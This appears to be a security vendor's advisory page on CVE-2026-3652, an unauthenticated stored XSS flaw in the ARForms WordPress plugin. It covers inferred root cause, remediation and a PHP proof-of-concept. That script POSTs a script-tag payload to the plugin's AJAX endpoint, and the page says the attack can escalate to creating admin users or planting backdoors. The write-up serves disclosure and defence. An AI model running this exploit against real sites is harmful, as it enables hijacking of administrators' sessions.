Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : June 25, 2026

CVE-2026-3652: ARForms <= 7.1.3 Unauthenticated Stored Cross-Site Scripting via 'value' Parameter PoC, Patch Analysis & Rule

CVE ID CVE-2026-3652
Plugin arforms
Severity High (CVSS 7.2)
CWE 79
Vulnerable Version 7.1.3
Patched Version
Disclosed June 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3652 (metadata-based): This vulnerability allows unauthenticated stored cross-site scripting (XSS) in the ARForms plugin for WordPress, versions 7.1.3 and earlier. The flaw exists in the ‘value’ parameter of the ‘arf_save_incomplete_form_data’ AJAX action. An unauthenticated attacker can inject arbitrary web scripts that execute when an administrator views the ‘Partial Filled Form Entries’ page in the ARForms dashboard. The CVSS score is 7.2 (High) with a network attack vector, low complexity, no privileges required, and no user interaction.

The root cause is insufficient input sanitization and output escaping on the ‘value’ parameter passed to the ‘arf_save_incomplete_form_data’ AJAX handler. Based on the CWE-79 classification, this is a classic stored XSS vulnerability. Atomic Edge analysis infers that the plugin likely saves this parameter directly to the database without calling WordPress sanitization functions like ‘sanitize_text_field’ or ‘wp_kses_post’ on input. Similarly, when rendering the ‘Partial Filled Form Entries’ admin page, the plugin probably outputs the stored value without using ‘esc_html’ or ‘wp_kses’ for escaping. These conclusions are inferred from the CWE and description, as no code diff is available.

Exploitation requires sending a POST request to ‘/wp-admin/admin-ajax.php’ with the action parameter set to ‘arf_save_incomplete_form_data’ and the ‘value’ parameter containing a JavaScript payload. The attacker does not need authentication or a nonce. A typical payload would include script tags or event handlers, such as alert(‘XSS’). The AJAX request triggers the handler, which stores the payload. When an administrator later loads the ‘Partial Filled Form Entries’ page, the stored script executes in their browser session.

Remediation requires implementing proper input sanitization and output escaping for the ‘value’ parameter. On input, the plugin should use ‘sanitize_text_field’ or ‘sanitize_textarea_field’ depending on expected data. On output in the admin dashboard, the plugin must use ‘esc_html’ or ‘wp_kses’ to prevent HTML execution. A nonce check should also be added to the AJAX handler to prevent unauthenticated submissions. Since no patched version exists, site administrators should disable the ARForms plugin or use a web application firewall to block exploitation attempts.

If exploited, an attacker can execute arbitrary JavaScript in the context of the WordPress admin dashboard. This enables actions such as creating new admin users, modifying plugin settings, injecting backdoors, or exfiltrating sensitive data. Although the CVSS confidentiality and integrity impact are rated low, the attack can escalate to full site compromise when combined with other techniques like privilege escalation via WordPress admin functions.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3652 - ARForms <= 7.1.3 - Unauthenticated Stored Cross-Site Scripting via 'value' Parameter

// This proof-of-concept demonstrates unauthenticated stored XSS by sending a malicious payload
// to the arf_save_incomplete_form_data AJAX endpoint.

$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site URL
$ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';

// Payload: a simple JavaScript alert that triggers when admin views the partial entries page
$payload = '<script>alert("XSS by Atomic Edge");</script>';

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'action' => 'arf_save_incomplete_form_data',
    'value' => $payload
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

// Optional: Set a user-agent to mimic a browser
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36');

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] Target: $target_urln";
echo "[+] Payload: $payloadn";
echo "[+] HTTP Response Code: $http_coden";

if ($http_code == 200) {
    echo "[+] Request sent successfully. The payload should now be stored.n";
    echo "[+] When an admin visits the 'Partial Filled Form Entries' page, the XSS will trigger.n";
} else {
    echo "[-] Request failed. The plugin may not be present or the endpoint does not match.n";
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School